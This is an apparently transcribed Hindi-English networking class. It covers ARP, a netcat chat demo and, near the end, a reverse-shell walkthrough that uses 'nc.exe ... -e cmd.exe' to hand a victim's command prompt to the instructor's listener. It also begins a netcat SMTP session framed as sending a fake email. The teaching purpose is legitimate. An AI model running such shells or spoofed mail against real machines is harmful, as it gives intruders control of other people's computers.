मैक एड्रेस ऑफ डिवाइस हु हैज, डिवाइस की वजह मैं इसको NIC कह देता हूं, नेटवर्क इंटरफेस कार्ड, ठीक है। मैक एड्रेस ऑफ NIC हु हैज लॉजिकल IP एड्रेस, ठीक है। ARP क्या होता है? ARP इज एड्रेस रेजोल्यूशन प्रोटोकॉल, एड्रेस रेजोल्यूशन प्रोटोकॉल। एड्रेस रेजोल्यूशन प्रोटोकॉल का क्या मतलब है? जब भी आप किसी के साथ कनेक्शन शुरू करते हो, सबसे पहला जो पैकेट जनरेट होता है वो होता है ARP पैकेट। ARP पैकेट क्या करता है? जितनी भी डिवाइसेस हैं वो सारी डिवाइसेस के पास एक ARP पैकेट जाता है, ठीक है। सारी डिवाइसेस ARP पैकेट रिसीव करती हैं। रिसीव करने के बाद में वो ये चेक करती हैं कि ARP पैकेट कौन से IP के लिए आया है, ठीक है, कौन से IP के लिए आया है। तो वो चेक करते हैं कि इफ आई हैव दैट IP एड्रेस, तब से ऑफ था ये, नहीं अभी नाउ। सो लेट मी जस्ट शो यू ARP प्रोटोकॉल फर्स्ट, ठीक है। सो यहां पे पहले क्या होगा, जैसे आपका ARP पैकेट आपको मिल गया, यू विल चेक मैक एड्रेस ऑफ NIC हु हैज लॉजिकल IP एड्रेस, ओके। एंड इन द थर्ड स्टेप देन कनेक्शन विल बी एस्टैब्लिश्ड विद द PC, ठीक है। जिसके पास वो IP एड्रेस होगा उसका हमें मैक मिल जाएगा, और जो कम्युनिकेशन होगा वो मैक टू मैक होगा, ठीक है। मैं अपने कंप्यूटर से आपके मैक के लिए एक पैकेट भेजूंगा, आपका मशीन रिसीव करेगा। आप जब अपने मशीन से पैकेट भेजोगे, आप वो मेरी डेस्टिनेशन मैक के लिए भेजोगे, मैं उस पैकेट को एक्सेप्ट करूंगा, ठीक है। चलो मैं आपको दिखाता हूँ। Every device has its own unique address. See, every individual adapter has just one MAC address. सबसे हाँ, पैकेट आप किसी को भी भेज सकते हो, रिसीव अपने मैक के लिए कर सकते हो बस। ब्रॉडकास्टिंग इज नॉट अ प्रॉब्लम, रिसीविंग इज अ प्रॉब्लम, ओके। नाउ लेट मी जस्ट शो यू एड्रेस रेजोल्यूशन प्रोटोकॉल। Welcome to Networking Fundamentals. This online program by Juniper Networks is designed. Now that we've learned about network models, layers, Ethernet operations, wireless LANs, एक मिनट इसमें से चेक करते हैं। Ethernet operations में आए। एक मिनट चेक करते हैं। Ethernet standards include a number of components. First,
नाउ व्हाट वी एग्जैक्टली हैव इज कि ARP प्रोटोकॉल में क्या होगा, जब भी आपको किसी मशीन के साथ में कनेक्शंस बनाने हैं, ठीक है, तो जैसे मान लो डिवाइस 1 would like to connect to device 2, okay, so in order to make a connection device 1 needs to know the MAC address of device 2, only then a connection will be established, okay, but in actual communications we ask IP addresses, ठीक है, तो IP एड्रेस से MAC आइडेंटिफाई किया जाता है। कैसे आइडेंटिफाई होता है? ARP प्रोटोकॉल के थ्रू। होता क्या है उसके अंदर, क्लाइंट जो है वो एक रिक्वेस्ट जनरेट करता है टू गेट द MAC एड्रेस ऑफ सर्वर मशीन, ओके, और इस रिक्वेस्ट को हम कहते हैं ARP पैकेट, ठीक है, क्लियर। सारी डिवाइसेस को वो ARP पैकेट ब्रॉडकास्ट करता है, सारी डिवाइसेस अपने अपने मशीन में ARP पैकेट रिसीव करती हैं। ARP पैकेट में एक्चुअली क्या होता है, ARP पैकेट जाता है ब्रॉडकास्ट डोमेन के एड्रेस के लिए, ठीक है। ब्रॉडकास्ट डोमेन का जो MAC एड्रेस होता है वो होता है FF हाँ आएगा, हाँ, इथरनेट ऑपरेशंस 2 ही है, तो आप घर जाके एक बार देख लेना, ठीक है ना। नाउ अब ये है, ठीक है, ये होता है ब्रॉडकास्ट डोमेन का MAC एड्रेस। कोई भी मशीन या तो अपने खुद का MAC एक्सेप्ट कर सकती है या फिर वो पैकेट जो ब्रॉडकास्ट डोमेन के लिए आया है उस पैकेट को एक्सेप्ट कर सकती है, ठीक है। तो जो ARP पैकेट इनिशियलाइज होता है वो जाता है ब्रॉडकास्ट डोमेन के लिए, यानी सारे के सारे MAC एड्रेसेस, MAC डिवाइसेस उसको एक्सेप्ट कर लेंगे उस पैकेट, ठीक है। एक्सेप्ट करने के बाद वो नेटवर्क लेयर पे ट्रांसफर कर देंगे, वहां पे चेक होगा कि डू आई हैव दिस IP एड्रेस और नॉट। जिन जिन के पास IP एड्रेसेस नहीं होंगे वो सब उस पैकेट को ड्रॉप कर देंगे एट द सेम टाइम, और लॉजिकल IP एक ही मशीन के पास में होगा, जिस मशीन के पास में होगा वो उसका एक ARP रिप्लाई जनरेट करेगी। रिप्लाई में क्या होगा, रिप्लाई में उस डिवाइस का MAC एड्रेस होगा, ठीक है। अब वो पैकेट रिसीव करेगा सोर्स, और फिर उसको पता चल जाएगा कि अच्छा ये जो IP एड्रेस मैंने ढूंढा था उसका जो MAC एड्रेस है वो ये वाला है, तो फिर अब हमारा MAC टू MAC कम्युनिकेशन एस्टैब्लिश हो जाएगा, ठीक है। अब जो भी मैं पैकेट भेजूंगा वो सिर्फ इसके MAC के लिए भेजूंगा, तो बाकी जितने डिवाइसेस हैं वो MAC लेयर पे ही उस पैकेट को डिस्कार्ड कर देंगे। जो सेंडर होते हैं वो भी चेक करते हैं, मतलब सेंडर मशीन ही चेक करती है पहले कि किस MAC को भेजना है, और रिसीवर मशीन ये डिसाइड करती है कि मुझे एक्सेप्ट करना है या नहीं करना है, ठीक है, समझ गए। नाउ अब देखो मैं अभी इसको प्रैक्टिकली दिखाता हूं तुम्हें करके, समझ में आ गया ये चीज। तो अब क्या होगा, नाउ द थर्ड थिंग वी नीड टू गेट इज ट्रांसपोर्ट इंफॉर्मेशन, ठीक है। जो कम्युनिकेशन होगा प्रैक्टिकली वो MAC टू MAC के बेसिस के ऊपर होगा, ठीक है, बट ये दिखेगा नहीं, ये दोनों, ये ऑपरेशन आपको नहीं दिखेगा कभी भी, ठीक है। ये आपको तब दिख सकता है जब आप किसी टूल के थ्रू आप मॉनिटरिंग कर रहे हो, ठीक है। अदरवाइज आप एक IP एड्रेस को कनेक्ट करोगे, उसका पोर्ट नंबर स्पेसिफाई करोगे और एक एप्लीकेशन एग्जीक्यूट करोगे, डेटा एक्सचेंज होना शुरू हो जाएगा, ठीक है। चलो अब हम इसका एक प्रैक्टिकल डेमो करते हैं, ठीक है। प्रैक्टिकल डेमो करने के लिए आई एम गोइंग टू मेक यूज ऑफ एन एप्लीकेशन नोन एज नेटकैट, ओके, नेटकैट, यस, नेम ऑफ द एप्लीकेशन इज netcat.exe, ओके, ठीक है। आप लोग एक काम कीजिए, गूगल ओपन कीजिए, यस, ओपन गूगल, ठीक है। यू हैव टू डाउनलोड नेटकैट विथ E ऑप्शन, सो इट इज नेटकैट प्लस डाउनलोड, you have to download netcat, ओके। यहां पे आपके पास एक URL आ रहा है eternallyboard.org समथिंग समथिंग एंड netcat, ठीक है। ओपन दिस, ठीक है, and now you can go to netcat 1.12, use this option netcat 1.12 and download the zip file, okay। सभी लोग कर रहे हैं डाउनलोड,
once the file is downloaded, you have to start using this application. ओके एक काम और भी कर सकते हो, अगर डाउनलोड होने में अगर इन केस टाइम लगा रहा है, ठीक है, तो मुझे एक पेन ड्राइव दे दो, मैं आपको पेन ड्राइव में कॉपी कर देता हूँ. गिव मी अ पेन ड्राइव, आप लोग आपस में शेयर. हाँ सही है, ज़रूरी नहीं है, कोई वायरस तो कोई रोक ही नहीं सकता और स्लो करता है. छोटे बच्चों के लिए एंटीवायरस. ठीक है. नाउ सो क्या आ रहा है? nc.exe आ रहा है उसमें. कोई बात नहीं, मैंने आपको जो दिया ना वो कॉपी कर लो. मेरा वाला कॉपी कर लो, ठीक रहेगा, फिर हम सब लोग डेमो कर पाएंगे ठीक से. ठीक है. हाँ सी ड्राइव में NC11NT पेस्ट कर दीजिए आप लोग. हो गया पेस्ट? ठीक है. अभी वैसे आप इसे बंद कर दो, इस विंडो को जो ब्लैक वाली खुली है. मैंने आपको जो दिया है ना प्रोग्राम, उसे कॉपी करो, मैं कमांड लाइन से ऑपरेट कराऊंगा उसे. ठीक है. अभी सब बताता हूँ. कॉपी कर लिया? Copy that and keep that in C drive. So here everybody has netcat.exe. Now what we actually did, after you have copied your netcat.exe within your C drive, you all will have a directory nc11nt. ठीक है, सबके पास है ये डायरेक्टरी? आ रही है? ठीक है ये डायरेक्टरी सबके पास में? ओपन कर लिया आपने ये डायरेक्टरी? ठीक है. डायरेक्टरी के अंदर एक प्रोग्राम है nc.exe नाम का. इज दैट क्लियर? नाउ व्हाट एम आई गोइंग टू डू? आई एम गोइंग टू यूज माय कमांड प्रॉम्प्ट एज वेल, और मैं कमांड प्रॉम्प्ट से इस प्रोग्राम को यूज करूंगा. ठीक है. So in order to reach to this directory nc11nt and to execute nc.exe, we have to use a command in our C drive known as cd. cd stands for change directory, and we are going to give the name of the directory nc11, जैसे मैंने इतना दिया. उसके बाद में मैं tab यूज करूंगा. tab, as soon as I press tab, तो ऑटोमेटिकली वो सजेस्ट कर देगा मुझे कि फोल्डर का नाम क्या है. tab, yes. टैब इज जनरली यूज्ड फॉर फास्ट टाइपिंग. मतलब आपको पूरा फोल्डर का नाम नहीं लिखना पड़ेगा, बस आपने 2-3 कैरेक्टर्स डाल दिए, टैब दबा दिया, अपने आप सजेस्ट कर देगा वो इसका नाम. अगर 2-3 फोल्डर्स हैं सेम इनिशियल से, तो आप जैसे 2-3 बार दबाओगे तो एक एक करके नाम आ जाएगा. क्या? NC1190 cd ... या cd स्पेस / cd स्पेस / ओके. उनका हो गया. आपस में एक दूसरे का देखते रहना कमांड लाइन, सबका हो रहा है या नहीं? क्या चीज? हाँ, cd11nt. ओके. Now once you're here in the directory here, if you execute dir command, you can see that you will get all the files which are available and listed in the directory. Okay. So above here we have the graphical view of our nc.exe. Here we have the command line view. Okay.
Most of the time we will be operating via command line. Okay, clear? Now I need one more thing. You have to set the path of this nc.exe as an environment variable. Okay, due to this what you will be able to do, again and again you don't need to change your directory to nc11nt. आप nc.exe को कहीं से भी एक्सेस कर पाओगे. ठीक है, तो what am I going to do in this third demonstration? I am going to set nc.exe on environment variables. Okay, and how am I going to do that? Let's have a look. So the first step is, जिस डायरेक्टरी में ये फाइल है, you have to copy the path. Okay, so let me just copy the path. C nc11nt, right click and copy. करते जाइए साथ साथ में मेरे. Okay, you have to copy the path. Once you have copied this path, now what will you do? You will go to My Computer, right click on My Computer, and you can go to Properties. आप हो उस ड्राइव में, सी ड्राइव में nc11nt जिसके अंदर आपने अपना वो डाला हुआ है. हाँ, तो आ जाएगा. क्लिक करो साइड में, यहां से बाहर क्लिक करना पड़ेगा ऐसे यू. ओके, हाँ, माई कंप्यूटर, राइट क्लिक, प्रॉपर्टीज. ओके, सो वंस यू विल ओपन द प्रॉपर्टीज, yes, you will get one option, advanced system settings. Okay, to click on advanced system settings, then on the tab view here you have to go to advanced. Okay, advanced में आप click करेंगे, here you will get an option known as environment variables. Okay, click here. Now in case if you have a variable known as path created, तो आपको क्या करना पड़ेगा, इस पाथ को एडिट करना पड़ेगा. ठीक है, अगर नहीं है आपके में पाथ वेरिएबल क्रिएटेड, तो आप क्या करेंगे, न्यू पे क्लिक करेंगे. यू विल गिव अ वेरिएबल नेम पाथ, PATH, and you are going to paste your path here. Okay, click on OK. Okay, अप्लाई कर दीजिए. ठीक है, जिन लोगों के में पाथ वेरिएबल ऑलरेडी क्रिएटेड है, समटाइम्स पीपल जो जावा इंस्टॉल करते हैं वो पाथ सेट करते हैं. ठीक है, तो यू कैन सेलेक्ट योर पाथ, एडिट. इन केस इफ अ पाथ इज ऑलरेडी स्पेसिफाइड, यू कैन गो टू एंड ऑफ द फाइल, यू कैन यूज सेमीकोलन एज अ सेपरेटर, एंड देन यू कैन पेस्ट योर पाथ हियर एज वेल. ओके, ऐसा भी आप कर सकते हैं. ठीक है, तो इन केस अगर वेरिएबल क्रिएटेड नहीं है तो यू हैव टू क्रिएट अ वेरिएबल. इन केस अगर वेरिएबल है, एडिट द वेरिएबल. नाउ आई ऑलरेडी हैव द पाथ सेट फॉर माय डिवाइस, फॉर माय netcat, so I can automatically use netcat.exe from any path I want. Okay, now so let's just close it, and the path is set. Okay, so now what you can do is just you need to exit your command prompt and start your command prompt again. To do this, I'll type in cmd.exe. I'm going to run my command prompt as an administrator. Okay, and now you can see that since at this time we are in Windows System 32, अगर आप यहां से भी nc.exe टाइप करोगे, ठीक है, दो nc.exe इस पाथ पे तो नहीं है, बट अगर आप टाइप करोगे तो भी वो चलेगा. ठीक है, यानी अब आप किसी भी कंप्यूटर में, किसी भी डायरेक्टरी पे हो, अपने कंप्यूटर में किसी भी डायरेक्टरी में हो, आप वहां से डायरेक्टली nc.exe अब आप ऑपरेट कर सकते हैं. ठीक है, क्लियर? Hence, this is why we have set our path. So our demonstration 3 is also complete. Now let's come to the point wherein we are going to perform the demo. तो अब क्या है, जैसे ही आप किसी भी ड्राइव में आएंगे, अब आपको वहां से netcat.exe ऑपरेट करना है और यूज करना है. ठीक है, क्या करवाने वाला हूं मैं अब आपको वो बताता हूं. ऑन द नोटपैड हियर
अब हमारे पास क्या है, दो ये डिटेल्स हैं हमारे पास. वी हैव वन मशीन, देवांशु की मशीन, वी हैव अदर मशीन नोन एज सौरभ्स मशीन. ठीक है. नाउ व्हाट वी नो वी डोंट नीड टू नो द मैक एड्रेस, क्योंकि ये तो ऑटोमेटिक प्रोसेस होगा, ARP प्रोटोकॉल विल हैंडल. और कहाँ होगा, कैसे होगा, वो मैं आपको दिखाऊंगा. आई हैव द IP एड्रेस इंफॉर्मेशन. आई नो कि मेरे को इस मशीन को कनेक्ट करना है. ट्रांसपोर्ट लेयर, ओके. I need to know the port number of the client of the server machine where Netcat application is running. Only then I will be able to communicate with that Netcat application. ठीक है, ठीक है. तो आपको क्या करना पड़ेगा, let's say on the server side, okay. Let's say on the server side, चलो मैं बनता हूँ server, ठीक है. Let's say I will be server and Saurabh will be client and you all will be clients. आप सब लोग client होंगे, ठीक है. मैंने क्या करूंगा, मैं netcat.exe रन करूंगा. लेट्स से ऑन अ पोर्ट नंबर बिटवीन 1 to 65,535 के बीच में से कोई भी एक रैंडम पोर्ट सेलेक्ट कर लूंगा. लेट्स से मैं एक रैंडम पोर्ट सेलेक्ट कर रहा हूं जिसका नाम है 6789. ऐसे सेलेक्ट करें रैंडम पोर्ट, एनीथिंग बिटवीन 1 to 65,535 विच इज नॉट प्री ऑक्यूपाइड. ओके, मैंने ऐसे सेलेक्ट कर लिया. अब देखो, तो what am I saying? I am going to run nc.exe on a port number 6789 and I will be listening on my IP address 192.168.43.234. What client will be doing from his machine, he is going to execute netcat.exe और destination machine के port number 6789 से वो connect करेगा. ठीक है, तो automatically इस machine से ऊपर से एक नीचे तक कनेक्शन आएगा, फिजिकल लेयर से इधर चला जाएगा, फिजिकल लेयर फिर मैक लेयर को फॉरवर्ड करेगी, वो मैक चेक करेगा, IP चेक करेगा, पोर्ट चेक करेगा और फिर डेटा नेटकैट एप्लीकेशन को मिल जाएगा. ठीक है, क्लियर. अब बताता हूं कैसे, पहले प्रैक्टिकल करते हैं. ठीक है, चलिए. सो नाउ प्रैक्टिकली वी हैव टू थिंग्स हियर. लेट्स कम टू द डेमो 4 एंड व्हाट वी आर डूइंग, वी आर क्रिएटिंग अ सिंपल चैट एप्लीकेशन. लेट्स, ठीक है, एक सिंपल चैट एप्लीकेशन अभी हम बनाते हैं. Chat application में we have a server, okay, and we have clients. चलो ऐसे बनाते हैं, सर्वर और क्लाइंट अलग अलग लिखेंगे. सर्वर, ठीक है. सर्वर क्या करेगा, how to start a server. This is the demo and what we have to do using command prompt, we have to execute a command nc.exe, ठीक है, -listen verbose port. ठीक है, LVP क्या है, L stands for listen, यानी you will be listening for incoming connections. V stands for verbose, which means in case अगर कोई error आ जाता है या कोई output आता है तो वो सब कुछ screen पे visible होगा. Verbose का मतलब होता है everything will be visible, जो भी हम communicate कर रहे हैं. ठीक है. And P stands for port number. ठीक है. तो we are going to execute a command nc.exe-lvp. And then I have to specify a port number on which I want to make my nc.exe application listening. Okay, so I will be listening on a port number, let's say 6789. Okay, this is the server property. Now we come to the client section. Now what the client will do, let's understand. Okay, now, so what next we have a server who will be listening on 6789, okay, and on the client side पे हमारे पास क्या होगा. ठीक है, क्लाइंट साइड में IP एड्रेस ऑफ सर्वर शुड बी नोन. जैसे आपको फेसबुक के बारे में पता होना चाहिए, बट फेसबुक को आपके बारे में पता होना चाहिए ऐसा बिल्कुल भी जरूरी नहीं है. ठीक है ना, आपको अगर फेसबुक कनेक्ट करना है तो आपको उसका IP एड्रेस चाहिए, गूगल को कनेक्ट करना है तो आपको गूगल का IP एड्रेस चाहिए. So this means clients need to know the address of the server. Okay, so this is the first property, and let's say IP address of the server is 192.168.43.234. ठीक है, बता दिया मैंने आप लोगों को अपना IP एड्रेस की मेरा जो सर्वर है वो यहाँ पे लिस्ट है. Second thing, now in order to connect, how to connect
to server. उसका जो command है, using run as administrator, what you will be doing, you will be executing this command. nc.exe -v verbose, okay? Connect to server IP and the server port, okay? Hash nc.exe -v 192.168, मैं एक एग्जाम्पल दे रहा हूं आपको, 43.234 ऑन पोर्ट नंबर 6789. यस, पोर्ट नंबर भी हमें पहले ही पता होना चाहिए. जनरली जो एप्लीकेशंस होती है जैसे वेब सर्वर, बाय डिफॉल्ट पोर्ट नंबर 80 पे रन होते हैं, तो आप ऑटोमेटिकली पोर्ट 80 पे कनेक्ट करते हो, आपको स्पेसिफाई नहीं करना पड़ता. यस, पोर्ट 80. FTP 21 के ऊपर रन होता है, ठीक है. सिक्योर शेल 22 पे रन होता है, फिक्स्ड पोर्ट्स, डिफॉल्ट पोर्ट्स क्या है. हाँ, यूज कर सकते हैं, क्योंकि अभी माई कंप्यूटर इज नॉट अ सर्वर, तो आई डोंट हैव ऑलरेडी रनिंग वेब सर्वर. अगर कोई एप्लीकेशन ने किसी पोर्ट को ऑक्यूपाई नहीं कर रखा है तो आप उसे यूज कर सकते हैं, ठीक है. इन केस इफ यू वांट टू चेक, नाउ, ठीक है, every logical port is equivalent between 1 to 65,535. okay, there is no biased, computer बिल्कुल भी biased नहीं है. okay, now so what next you have, you've got this, समझ में आ गया ये. अब देखो, अब हमें इसका प्रैक्टिकल डेमो करना है, ठीक है. तो ये एप्लीकेशन तो रन करूंगा मैं अपने मशीन में, और ये कमांड रन करेंगे आप लोग अपने मशीन में, ठीक है. सब लोग नहीं, अभी एक एक करके, ठीक है. हम डेमो करेंगे, बीच वाले मशीन में करेंगे, ताकि आप लोग देख सको कि कैसा डेमो रहा. फिर आप इंडिविजुअली एक एक करके कनेक्ट करना, फिर आप अपना सर्वर बनाओगे और मैं कनेक्ट करूंगा, ठीक है, ताकि आप समझ पाए कि हाउ दिस बेसिक नेटवर्किंग वर्क्स. नाउ सो लेट्स डू दैट. सो आई एम अ सर्वर हियर, आई एम राइटिंग अ कमांड nc.exe -lvp 6789, okay, and as soon as I pressed enter, I am listening, my server is ready. आप लोगों को अब क्या करना है, आप लोगों को अपना कमांड प्रॉम्प्ट ओपन करना है, ठीक है, और वहां पे जाके आपको क्या करना है, यू हैव टू एग्जीक्यूट योर कमांड ऑन योर मशीन. यू विल बी डूइंग समथिंग लाइक nc.exe -v 192.168.43.234 कनेक्ट ऑन पोर्ट नंबर 6789. ओके, देखते हैं सबसे पहले कौन कनेक्ट करता है. क्या बना लिया आपने, अपना बनाया, ठीक है. तो आप कनेक्ट कर लो. ये अपना आईपी एड्रेस और पोर्ट नंबर आपको बता देंगे, तो आप बस नीचे आईपी एड्रेस और पोर्ट नंबर अपना मॉडिफाई कर लीजिए, ठीक है. कनेक्ट कीजिए. दिस शुड बी सिंगल वी 192.168 आपने 5 सेट कीजिए. ओके, क्या हो भैया, कोई नहीं कनेक्ट कर पाया. आ गया. सो गौरव के पीसी से कनेक्शन आ गया. हुज गौरव? आप, ठीक है. अच्छा, मेरे लैपटॉप पे गौरव, हाँ, यूजर नेम आपका गौरव है. सो नाउ यू सी, सो व्हाट आई हैव गॉट अ कनेक्शन टू दिस आईपी व्हिच इज मी, and I've got a connection from this IP address 87, and by default the port has been selected 51300, ठीक है. Anything client side पे एक random port automatically select हो जाए, ठीक है. सर्वर साइड पे पोर्ट नंबर फिक्स होना चाहिए, बट क्लाइंट साइड से कोई भी एक रैंडम पोर्ट सेलेक्ट होके जो खाली होगा उस पोर्ट के थ्रू कनेक्शन बन जाएगा, ठीक है. पोर्ट इज इंपॉर्टेंट ऑन द सर्वर साइड, नॉट ऑन द क्लाइंट साइड, ठीक है. क्लियर? कनेक्शन बन गया. अब देखो, अब जैसे मैं अगर इन्हें भेजता हूं, और भाई कैसन हो, have you got that? Yes. Okay, now if you want to reply you can do that. बढ़िया है, मैं ऐसे मत लिखूंगा, बिहारी वीडियो बन जाएगा. बढ़िया बात. ओके, राइट.
Okay, so what you have is we have got a reply here. Clear? तो अब क्या है ना, अब मैं इसको कुछ भी लिख सकता हूँ, ठीक है? So आ रहा है, एक्सचेंज हो रहा है डेटा. नाउ द इंपॉर्टेंट थिंग इज, बन गया कनेक्शन? कितना मुश्किल है? कुछ भी मुश्किल नहीं है, बस हमें कॉन्सेप्ट बताना चाहिए. वी हैव एन एप्लीकेशन, वी हैव अ पोर्ट लिसनिंग, आईपी एड्रेस हमें पता है, हमने कनेक्ट कर लिया. यही है नेटवर्क. नेटवर्किंग इज वेरी सिंपल. द ओनली थिंग इज यू शुड बी लॉजिकली अंडरस्टैंडिंग दिस. ठीक है? अब क्या चीज है? अब ये जो हमने अब्बा डब्बा जब्बा भेजा, हर प्रोटोकॉल अपनी अलग तरीके से रिक्वेस्ट को प्रोसेस करता है. अभी मैंने जो तुम्हें रिक्वेस्ट भेजी, तुमने उसको रिस्पॉन्ड नहीं किया. क्यों? तुमने उसे रिस्पॉन्ड इसलिए नहीं किया क्योंकि तुम्हारा कंप्यूटर उस रिक्वेस्ट को समझे ही नहीं. ठीक है ना? मान लो ऐसा होता कि मैं तुमसे पूछता, जैसे तुम्हारा रिक्वेस्ट मेरे को नहीं पता क्या है प्रोटोकॉल, बट अभी अगर हम पर्सन टू पर्सन समझे तो तुम्हारा भी इंग्लिश प्रोटोकॉल है, मेरा भी इंग्लिश प्रोटोकॉल है. मैं अगर तुमसे पूछूं व्हाट्स योर नेम, तो जनरल सी बात है तुम मुझे उसका रिस्पॉन्ड करोगे उस लैंग्वेज में. ठीक है? तो अब कम्युनिकेट करने के लिए देयर आर एन नंबर ऑफ प्रोटोकॉल्स अवेलेबल. SSH प्रोटोकॉल है, HTTP प्रोटोकॉल है, HTTPS प्रोटोकॉल है. ठीक है ना? देयर आर मेनी प्रोटोकॉल्स. Every individual protocol has different set of methods and different way of sending data and receiving data. ठीक है? Now who's a hacker? A hacker is a person who understands most of the protocols and he knows where to send malicious data or that data which can modify system behavior. Okay? So first of all, you cannot directly move into a computer and hack it. You need to understand the protocol. You will be hacking protocols. Okay? एक दूसरी मशीन को चलाना बहुत आसान है. अब देखो कैसे चलाते हैं. Let's come to the next demo. ठीक है? Now. ब्रॉडकास्ट कर सकते हैं जैसे आपने किए. सब कर सकते हैं भाई, तो रुकता क्यों नहीं? मैं जो पढ़ा रहा हूँ पढ़ा तो लेने दो पहले. क्यों वीडियो खराब कर रहा है मेरी? हाँ. Now. ठीक है? समझ में आ गया? अब क्या था? ये तो था a way of communication data between each other, and at the moment there was no protocol specified. Okay, कि क्या request or response parsing होगी, processing होगी, it was not defined. Let's come to next point. Okay, as far as hacking is concerned, let's come to the next point. Hackers' way of using Netcat. Let's say. ठीक है? Netcat is known as hackers' Swiss Army knife. And it can be used anywhere. Wherever nothing works, Netcat works. Okay? The best beauty is Netcat do not have a protocol. You can modify it as per your own protocols. Just you need to understand them. And you can send data as in any way you want. Okay? और आप किसी भी प्रोटोकॉल्स के साथ इंटरैक्ट कर सकते हैं. ठीक है? जैसे मान लो अगर मेरे को नेटकैट के थ्रू इफ आई वांट टू कनेक्ट टू गूगल, आई कैन डू दैट. लेट्स से nc.exe google.com पोर्ट नंबर 80 -v. ठीक है? लेट्स से मैं गूगल के साथ कनेक्ट हो गया. अब गूगल के पोर्ट नंबर 80 पे वेब सर्वर चल रहा है. मैं अगर इसको कुछ भी भेजूं तो कहेगा ब्ला ब्ला ब्ला, मेरे को पता नहीं आपने क्या भेजा और ये आपका अब्बा डब्बा जब्बा. तो उसने मुझे भेज दिया कि इट्स अ वेरी बैड रिक्वेस्ट क्योंकि मैंने प्रोटोकॉल लेस भेजी ना. तो वी कैन कनेक्ट टू एनी सर्वर. ओके, क्लियर? अब जैसे दूसरा तरीका दिखाता हूँ. लेट्स से मान लो मेरे को तुम्हें फेक मेल भेजनी है. ठीक है? ध्यान से देखना. लेट्स से मैंने किया nc.exe. सुनो. हाँ, जैसे मान लो तुम्हारा मेल आईडी क्या है? @something.com. Let's do that. Let's have a look. nc.exe hackwither.in मैंने सेलेक्ट किया. SMTP servers work on port number 25. I have shown this to you, right? Port number 25. अब पोर्ट नंबर 25 अलग तरीके से प्रोटोकॉल्स को, रिक्वेस्ट्स को रिसीव करता है. ठीक है? SMTP प्रोटोकॉल की अलग डेटा एक्सचेंज मैकेनिज्म है. ठीक है? तो लेट्स से मान लो मैंने नेटकैट के थ्रू आई हैव टू यूज -v एज वेल. nc.exe -v hackwither.in पोर्ट नंबर 25.
तो वंस आई विल बी कनेक्टेड टू दिस SMTP सर्वर आई गेट अ रिस्पॉन्स फ्रॉम द सर्वर, और फिर वो मुझसे जिस टाइप की रिक्वेस्ट मांगेगा वो रिक्वेस्ट मैं यहां से इसे भेजूंगा। सिंस वी आर रनिंग आउट ऑफ टाइम, तो ऐसा करेंगे हम इस डेमो को करेंगे लेकिन क्विकली जब हम SMTP तक पहुंचेंगे, ठीक है। आज इसको अवॉइड करते हैं, हैकर्स वे पे मैं था वहां पे आ जाते हैं, हैकर्स वे ऑफ यूजिंग नेटकैट, ठीक है। तो देयर आर टू वेज टू हैक। द फर्स्ट वन बाइंड शेल, सेकेंड इज रिवर्स शेल, ठीक है। बाइंड शेल कॉन्सेप्ट अंडरस्टैंडिंग के लिए ठीक है बट यूजफुल नहीं है। हम जो करते हैं वो रिवर्स शेल करते हैं, तो अभी हम इसको यस करते हैं और ये मैं समझाऊंगा आपको रिवर्स शेल कैसे काम करते हैं, ठीक है। रिवर्स शेल में होता क्या है पहले कॉन्सेप्ट समझो, ठीक है। सर्वर साइड पे क्या होता है, रिवर्स शेल में सर्वर इज एन अटैकर, ओके, एंड क्लाइंट इज अ विक्टिम, ओके। नाउ listening on a port on a IP port, ठीक है। चलाने के लिए क्या कमांड होगी, nc.exe -lvp 6789, लेट्स, ठीक। विक्टिम क्या होगा, विक्टिम will connect to server and send his shell to server. शेल क्या होता है, कमांड प्रॉम्प्ट। शेल इज CMD। CMD चला गया तो आपका पूरा एक्सेस आ जाएगा, ठीक है, उस कंप्यूटर को। अभी देखते हैं कैसे। एंड द कमांड टू डू दिस इज लाइक दिस, nc.exe verbose connect to the server's IP 192.168.43.234 on port number 6789 and -e stands for execute cmd.exe, which means you can execute a program on your computer and you can give access of that program to someone else on the network, okay. So at this moment what he will be doing, he will execute a command prompt and give the access of the command prompt to that server on that port, ठीक है। तो सर्वर के पास एक्सेस चला जाएगा। ये जो कमांड अभी आप मैनुअली करोगे ना, ये एक्चुअली वायरस प्रोग्राम्स एग्जीक्यूट करते हैं अपने अलग अलग तरीकों से, ठीक है। वो क्या है, वही आपको आगे सीखने हैं कि आपको रिवर्स शेल दूसरे मशीन का कैसे मिलेगा। मोबाइल फोन्स की भी आप शेल ले सकते हैं, कंप्यूटर्स की भी शेल ले सकते हैं, आप कुछ भी कर सकते हैं, यू कैन डू एनीथिंग, ओके। हाँ, तो क्लाइंट ये डाले या फिर हम उसको एक प्रोग्राम दे दें प्रोजेक्ट बना के, ठीक है, या उसके पास कोई प्रोग्राम चल रहा हो तो उसमें हम कुछ कर दें, ठीक है। तो ऐसे बहुत सारे तरीके होते हैं, या हम उसे PDF दे दें या अपनी फोटो दे देंगे, ये देखो भाई मेरी नई फोटो, ये मेरी गर्लफ्रेंड की फोटो। गर्लफ्रेंड की जरूरत देखते हैं लोग फोटो, जैसे खोल के देखेंगे तो कोई ना कोई पेंट प्रोग्राम या कोई ना कोई फोटो व्यूअर ओपन करेगा। अगर वो मैलिशियस होगी फाइल, हो सकता है वो उस प्रोग्राम को एक्सप्लॉइट कर दे और एक रिवर्स शेल ओपन कर दे, हमारे पास डिटेल आ जाएंगी, हम कनेक्ट कर लेंगे उसको। कुछ नहीं कर सकता एंटीवायरस, एंटीवायरस छोटे बच्चों के। अच्छा अच्छा, कर रहा है वो तुम्हारे साथ, कुछ करना चाह रहा है वो तुम्हारे साथ कुछ। मैं बता दूंगा तुम्हें उसके प्रोग्राम को कैसे तुम्हें मॉडिफाई करना है, ठीक है। चलो, तो अब क्या है, नाउ दिस वी विल बी डूइंग एंड परफॉर्मिंग, ओके। तो नाउ आई विल बिकम अ सर्वर and any of the machine there you are going to connect to me, okay, using this command you will be client। हाँ, तुम बता नहीं पाओगे ना कि एक्सेस कैसे करना होता है, ठीक है। इसलिए अभी पहले तुम्हें विक्टिम बनना पड़ेगा। सर्वर बनने के बहुत मौके मिलेंगे तुम्हें, अभी मत घबराओ, अभी हमें तुम्हारा स्टफ देखने दो, तुम्हारे कंप्यूटर में क्या क्या है सर्च करने दो, क्या क्या रखा है तुमने। हिस्ट्री कितनी भी डिलीट कर लो, हम तो सब असलियत पता चलेगी अभी तुम्हारी। आओ आओ, तुम कनेक्ट करोगे। सब डर रहे हैं, क्या चक्कर है भाई, 